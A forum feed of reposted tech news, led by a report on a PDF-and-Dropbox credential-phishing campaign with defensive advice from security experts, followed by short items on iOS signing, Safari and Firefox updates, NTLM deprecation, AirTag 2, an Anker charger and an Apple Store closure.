“When people see a PDF or a Dropbox logo, their guard naturally drops,” said Avakian. Familiarity and the need for speed prevent them from pausing and taking a closer look. Attackers know this, and “exploit it perfectly.”
On top of this, Avakian pointed out, cloud infrastructure has become a “shield” for attackers. Security awareness has conditioned users to be wary of shady domains, but not of reputable platforms. It’s a mental model that’s outdated, and “attackers are way ahead of it.”
‘Don’t click links’ is not enough
Hackers know that many employees tend to touch payment processes and documents, noted Lionel Menchaca, content marketing and technical writing specialist at Forcepoint, so they must be trained to verify that invoices, purchase orders (POs), and contracts are coming from confirmed vendors, affiliates, and agencies.
“If they cannot verify, they should report suspicious emails to IT or security teams,” he said.
But the precautions don’t stop there, Shipley noted. Employees must develop good e-mail processing habits, such as by taking frequent breaks; simulations can help, as they allow people to break out of routine. Many email clicks (he estimates about 40%) occur when people are on autopilot and aren’t processing at the deep thinking level, “they’re just acting on instinct.”
Avakian agreed that email security awareness training must evolve beyond “don’t click links.” Employers and leaders at all levels must understand that modern phishing is increasingly “multi-stage, cloud-hosted, brand-impersonating, and intentionally boring-looking.” PDFs are no longer “safe by default,” and cloud services are no longer “trusted by default.”
“This type of incident becomes a great example, and [an] opportunity to build more sophisticated phishing testing,” said Avakian. “The goal is not to embarrass users, but to build security minded habits as to how attacks unfold today.”
While the basics still matter, they need to be framed honestly, he said. Hover over links, but understand that cloud-hosted URLs can still be malicious; check the sender’s “from” address and domain, but recognize that compromised or look-alike domains exist; be cautious of unexpected attachments, even PDFs, especially when they lead you somewhere else; treat any login prompts as a moment to pause, “especially when they’re triggered indirectly,” Avakian advised.
“Security awareness has to grow up, just like the threats did,” he said.
Still, clicks will happen, and effective multi-layered controls limit the damage. Multi-factor authentication (MFA), conditional access, and anomaly detection are critical, and a zero-trust mindset embeds security into a culture where the “trust by default” mindset goes away, said Avakian.
“At the end of the day, PDFs and Dropbox aren’t the problem; unquestioned trust is,” he said.
View the full article
- 0 comments
- 54 views
-
According to new research, attackers are still making mischief with PDFs, the old business standby, and are exploiting growing trust in services like Dropbox.
Forcepoint’s X-Labs team has uncovered a multi-stage phishing campaign that exploits PDF files and Dropbox storage through a layered redirection attack. After clicking on what looks like a legitimate PDF, victims are rerouted to a Dropbox logon impersonation page designed to harvest their credentials for internal access, account takeover, or other fraud.
“This is a perfect example of why phishing is still the number one way for criminals to get at organizations,” said David Shipley of Beauceron Security. “This attack works because it mimics normal business behavior.”
Anatomy of a multi-layered PDF attack
In this campaign, victims first receive a professional-sounding email that seems to be part of a normal procurement or tender process and asks them to review an attached document.
The type of wording is “commonly used in tender or procurement fraud, where urgency and legitimacy are deliberately created to encourage quick action,” wrote Forcepoint researcher Hassan Faizan.
The PDF serves as the primary malware delivery mechanism. Unbeknownst to the victim, the sender address is spoofed or associated with a compromised account. Once they click on the attachment, they are directed to a second PDF hosted on a trusted cloud service (public.blob[.]vercel-storage[.]com), which further redirects them to a fake Dropbox login page. If they take the bait, they’ll log in with their email address and password, and those credentials will be exfiltrated to attacker-controlled command and control (C2) infrastructure.
“The first [document] passed the email filter because it’s perfectly legitimate and links to a trusted service,” said Beauceron’s Shipley. “There’s no way to stop that without lots of negative business consequences.” The second one works because it’s not the trusted cloud service’s job to vet content hosted in it.
These types of email also often pass standard authentication checks such as sender policy framework (SPF), DomainKeys Identified Mail (DKIM), and domain-based message authentication, reporting, and conformance (DKIM).
“The minimal and business-like content helps avoid keyword-based detection, making the message look and feel more like a routine operational request,” Faizan wrote. Thus, attackers are able to convince victims that they need to authenticate to view the documents.
This phishing campaign is interesting in that it’s multi-faceted and has been “very well thought out,” noted Erik Avakian, technical counselor at Info-Tech Research Group. And it’s effective because “nothing looks obviously wrong to the end user at any single stage. The original email is clean and gets by most filters, the first PDF opens normally and seems to be hosted on a legitimate cloud service, and the Dropbox login page looks real.
“Each step, by itself, passes the sniff test,” he said. “The danger only becomes obvious when you zoom out and look at the entire chain, and most users don’t think about chains. They think in clicks.”
Masquerading as a safe document format
But after so many warnings about this over time — why are people still so trusting of PDFs and Dropbox?
“Because, historically, they’ve actually been trained to be,” said Avakian. PDFs are routinely used in the business world and have been positioned as a safe, read-only document format for invoices, contracts, HR forms, and statements. This applies to Dropbox, too; it’s become a mainstream business tool that employees have been encouraged to use, and has been positioned so that its services “are not some sketchy file-sharing site anymore.”
“When people see a PDF or a Dropbox logo, their guard naturally drops,” said Avakian. Familiarity and the need for speed prevent them from pausing and taking a closer look. Attackers know this, and “exploit it perfectly.”
On top of this, Avakian pointed out, cloud infrastructure has become a “shield” for attackers. Security awareness has conditioned users to be wary of shady domains, but not of reputable platforms. It’s a mental model that’s outdated, and “attackers are way ahead of it.”
‘Don’t click links’ is not enough
Hackers know that many employees tend to touch payment processes and documents, noted Lionel Menchaca, content marketing and technical writing specialist at Forcepoint, so they must be trained to verify that invoices, purchase orders (POs), and contracts are coming from confirmed vendors, affiliates, and agencies.
“If they cannot verify, they should report suspicious emails to IT or security teams,” he said.
But the precautions don’t stop there, Shipley noted. Employees must develop good e-mail processing habits, such as by taking frequent breaks; simulations can help, as they allow people to break out of routine. Many email clicks (he estimates about 40%) occur when people are on autopilot and aren’t processing at the deep thinking level, “they’re just acting on instinct.”
Avakian agreed that email security awareness training must evolve beyond “don’t click links.” Employers and leaders at all levels must understand that modern phishing is increasingly “multi-stage, cloud-hosted, brand-impersonating, and intentionally boring-looking.” PDFs are no longer “safe by default,” and cloud services are no longer “trusted by default.”
“This type of incident becomes a great example, and [an] opportunity to build more sophisticated phishing testing,” said Avakian. “The goal is not to embarrass users, but to build security minded habits as to how attacks unfold today.”
While the basics still matter, they need to be framed honestly, he said. Hover over links, but understand that cloud-hosted URLs can still be malicious; check the sender’s “from” address and domain, but recognize that compromised or look-alike domains exist; be cautious of unexpected attachments, even PDFs, especially when they lead you somewhere else; treat any login prompts as a moment to pause, “especially when they’re triggered indirectly,” Avakian advised.
“Security awareness has to grow up, just like the threats did,” he said.
Still, clicks will happen, and effective multi-layered controls limit the damage. Multi-factor authentication (MFA), conditional access, and anomaly detection are critical, and a zero-trust mindset embeds security into a culture where the “trust by default” mindset goes away, said Avakian.
“At the end of the day, PDFs and Dropbox aren’t the problem; unquestioned trust is,” he said.
View the full article
- 0 comments
- 44 views
-
Software "signing" means that it has passed the server-side verification check that Apple performs when a user downloads a new version of iOS on an iPhone. An update can't be installed unless it passes the verification check.
Apple does not show users earlier versions of iOS once an upgrade has come out, but when software is still signed, it is possible to downgrade using the macOS Finder on a Mac or the Apple Devices app on a Windows PC. Until today, users would have been able to downgrade from iOS 26.2.1 to iOS 26.2 if desired for some reason.
Unsigning software prevents Apple customers from installing outdated, less secure versions of iOS, and Apple typically stops signing an update a week or so after new software comes out.
Apple has also stopped signing several older versions of iOS provided for devices unable to update to iOS 26, including iOS 12.5.7, iOS 15.8.5, iOS 16.7.12, and iOS 18.7.3. iOS 12.5.8, iOS 15.8.6, and iOS 18.7.4 were released last week, while an updated version of iOS 16 came out today.
This article, "Apple Stops Signing iOS 26.2, Blocking Downgrades From iOS 26.2.1" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 29 views
-
Safari Technology Preview 236 includes fixes and updates for CSS, Forms, HTML, Images, Media, Rendering, SVG, Web API, and WebRTC.
The current Safari Technology Preview release is compatible with machines running macOS Sequoia and macOS Tahoe, the newest version of macOS.
The Safari Technology Preview update is available through the Software Update mechanism in System Preferences or System Settings to anyone who has downloaded the browser from Apple’s website. Complete release notes for the update are available on the Safari Technology Preview website.
Apple’s aim with Safari Technology Preview is to gather feedback from developers and users on its browser development process. Safari Technology Preview can run side-by-side with the existing Safari browser and while it is designed for developers, it does not require a developer account to download and use.Tag: Safari Technology Preview
This article, "Apple Releases Safari Technology Preview 236 With Bug Fixes and Performance Improvements" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 34 views
-
Here's what can be disabled:
Translations, which help you browse the web in your preferred language.
Alt text in PDFs, which add accessibility descriptions to images in PDF pages.
AI-enhanced tab grouping, which suggests related tabs and group names.
Link previews, which show key points before you open a link.
AI chatbot in the sidebar, which lets you use your chosen chatbot as you browse, including options like Anthropic Claude, ChatGPT, Microsoft Copilot, Google Gemini and Le Chat Mistral.
The AI features can be disabled entirely or individually, so users can pick and choose what they want to use. Users will be able to continue to opt out of AI features as they are added in the browser, and the main Block AI Enhancements toggle will disable all current and future AI features, including pop-ups or reminders to use existing or upcoming AI features.
Mozilla says that it wants to be able to continue to build AI options for those who want them, while also giving those who don't a way to disable them.
AI controls will be added in Firefox 148, which is set to start rolling out to users on February 24.Tag: Firefox
This article, "Firefox Getting New Controls to Turn Off AI Features" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 37 views
-
NTLM is a series of security protocols that were introduced in the 1990s, but since Kerberos became the default protocol in Windows 2000, its use has declined with each passing year.
Still, many legacy enterprise systems still support or use NTLM, making them vulnerability to NTLM relay attacks, for example. And while Microsoft administrators have been preparing for the demise of NTLM for years, many still struggle to rid their networks of the protocol.
In recent years, hackers have exploited NTLM flaws to gain full access to networks, so the disadvantages of supporting it outweigh the advantages. Microsoft now considers NTLM deprecated.
A timetable for the deactivation can be found on the Windows IT Pro Blog.
View the full article
- 0 comments
- 66 views
-
Subscribe to the MacRumors YouTube channel for more videos.
Unfortunately, Apple didn't update the design of the AirTag 2, so it looks almost identical to the original model. The only thing that's changed is the text on the back, which is now in caps and includes wording about the IP67 waterproofing, and that doesn't count as any kind of design change.
It would have been nice to have different design options or a rechargeable battery, but the AirTag is the same coin shape and it still uses CR2032 batteries. Apple didn't mention anything about battery life improvements, so the AirTag 2 still lasts about a year before you need to swap it out.
While there aren't external updates, Apple did boost connectivity. The AirTag 2 uses an upgraded version of Bluetooth and it has a second-generation Ultra Wideband (UWB) chip, so it can be tracked from further away over Bluetooth, and the close-range Precision Finding feature works over longer distances.
According to Apple, Precision Finding works from up to 50 percent further away, so when you lose your AirTag indoors or are close to it, a UWB-enabled iPhone (the iPhone 11 and later) can lead you right to it. Apple also enabled Precision Finding on the Apple Watch Series 9 and later and the Apple Watch Ultra 2 and later, which is super useful. You can't use an Apple Watch to locate an original AirTag nearby, and it's probably the best addition to the second-generation version.
You can even add a quick access toggle for Precision Finding to the Apple Watch for instant access to tracking down an AirTag without digging through menus. It's a much more natural way to find your items.
In our testing, Precision Finding on the Apple Watch worked reliably, tracking down an AirTag indoors even with walls and furniture in the way. The interface is the same as the Precision Finding interface on iPhone, just scaled down to an Apple Watch size. You'll get a directional arrow and distance to help you accurately track down the AirTag.
When pitting the original AirTag against the AirTag 2 with iPhone Precision Finding, the AirTag 2 was clearly superior. Both AirTags were tucked inside a backpack, and placed out of line of sight.
The original AirTag had a hard time with walls and objects, and required us to be closer to the backpack to get a connection. The AirTag 2 picked up signal from much further away, and kept the signal as we walked toward the backpack. It even worked with the AirTag 2 on a different floor, and kept its connection in a large office building.
Apple also updated the internals of the AirTag 2 to upgrade the sound, and it is noticeably louder. It is a pretty big improvement in audibility, and you will notice the difference between the two. The sound is sharper and easier to pinpoint, and it is much less likely to blend into background noise. It makes it easier to find items, but it also improves the AirTag 2's anti-stalking capabilities. It's harder to tuck an AirTag away and mute its sound, and Apple also made the speaker module more difficult to remove with additional adhesive.
The AirTag 2 is still priced at $29, with Apple offering a pack of four for $99, so it's a solid deal, especially with the tracking improvements. For most people, it's probably not worth upgrading to an AirTag 2 if you already have an original AirTag, but if you're someone that heavily relies on AirTags on a regular basis, it could be a good idea to pick up a couple of the second-generation versions.Related Roundup: AirTag
This article, "AirTag 2 Hands-On: What's New and Should You Upgrade?" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 31 views
-
The Prime Wireless Charging Station features Qi2.2 support, which lets a compatible MagSafe iPhone charge at up to 25W. It's the same speed as Apple's MagSafe charger, and it is 10W faster than the standard Qi2 MagSafe chargers.
The iPhone 16 and iPhone 17 models are able to fast charge with the Prime Wireless Charging Station, and can get up to a 50 percent charge within 30 minutes. We were able to test the Prime Wireless Charging Station ahead of launch, and it did indeed charge an iPhone 17 Pro Max from dead to 46 percent in a 30-minute period as promised. Wireless charging speeds can vary based on charge level, temperature, and other factors, but the Prime Wireless Charging Station is able to match Apple's native iPhone 17 MagSafe charging options.
Charging speeds are steady thanks to an active "AirCool" feature that keeps the iPhone cool while it's charging. It's meant to ensure the iPhone is below 98.6 degrees Fahrenheit while it's on the charger, and the iPhone 17 Pro Max did feel slightly cooler than when charging with a standard MagSafe charger. The included cooling system is close to inaudible with a tiny fan embedded at the back and a vent at the top, so it's suitable for use on a nightstand or desktop.
It's not clear if the active cooling makes a major difference in all circumstances since we have also been able to get a similar charge in a similar time period with Apple's MagSafe charger, but it could be a useful feature in hotter conditions. The room we tested in was around 68F, while Anker's testing conditions were at 77F. Anker's site suggests the active cooling allows an iPhone 17 to charge 24 percent faster with 30 percent less heat buildup. Anker says the cooling option is also meant to preserve battery health and maintain safety, which is worth considering.
Apple Watches that support fast charging are able to charge at maximum speed, and there is enough power for the AirPods or AirPods Pro. There is a tappable LED for controlling the AirCool feature, which you can tap to turn it on or off. The LED turns blue when the AirCool feature is on, or white when it's off. It'll also turn orange if you connect an incompatible adapter that's below 45W, which is helpful. If you're wanting to use the Prime Wireless Charging Station on your nightstand, you'll be glad to hear that the LEDs turn off after a few seconds so there is no annoying light at night.
The Prime Wireless Charging Station takes up minimal space, thanks to a folding design. The iPhone charges in an upright position with support for StandBy mode, while the pop-up Apple Watch charger is positioned behind with the AirPods charging platform underneath. The Apple Watch charger folds down into the iPhone charger with a hinge that feels durable, and you can press to pop it out. For charging the AirPods, there is an anti-slip pad that has a little AirPods icon for ideal alignment.
The whole thing folds down into a small, palm-sized package that's ideal for travel, measuring in at 3.8 inches by 2.4 inches by 1.2 inches. It's surprisingly light for what it is, similar in weight to the iPhone 17 Pro Max that we tested it with. You can use the iPhone charger with the Charging Station folded up, but you'll need to open it all the way to get to the Apple Watch and AirPods chargers.
The iPhone charging portion works as a stand, and you can change the angle from 0 to 60 degrees without the weight of the iPhone collapsing it down. It works well for watching videos or for FaceTime calls.
Anker includes a 45W power adapter that's needed to get the maximum charging speeds, along with a standard 5-foot USB-C to USB-C cable, which means the charger is ready to go out of the box. It would have been nice to have an integrated cable of some kind to really boost the travel-friendly design, but it's still a compact design that's easy to tuck into a backpack or suitcase. It also looks slick with a gray aluminum design, black magnetic charging surface for the iPhone and AirPods, and matching stabilizing feet at the bottom. The Apple Watch charger is a Made for Apple Watch design, so it's in white.
Anker's charger is designed for the latest iPhone 16 and iPhone 17 models, but it is backwards compatible with all iPhone models, and it also works with all Apple Watch models and all AirPods models. As with all magnetic chargers, if you want to use the charging station with an iPhone case, you'll need a MagSafe-compatible case.
The Prime Wireless Charging Station can be purchased from Amazon or from the Anker website for $120 thanks to a 20 percent launch discount. The price will go up to $150 after the launch promotion.Tag: Anker
This article, "Anker's New 3-in-1 MagSafe Charger With 25W Qi2.2 Fast Charging is Now Available for $120" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 38 views
-
Apple Passeig de Gràcia
The extent of renovations that will be completed remains to be seen, and Apple has not indicated when the store will reopen to the public.
Apple Passeig de Gràcia first opened in 2012, and it is one of the company's flagship retail locations. The store is on one of the most popular avenues in Barcelona, inside a historic former bank building with a stunning stone facade.
Apple has another store in Barcelona at the Westfield La Maquinista shopping mall.
Thanks, Filip Chudzinski!Tag: Apple Store
This article, "Apple's Beautiful Store in Barcelona Will Be Temporarily Closed Soon" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 39 views
-
|
|
|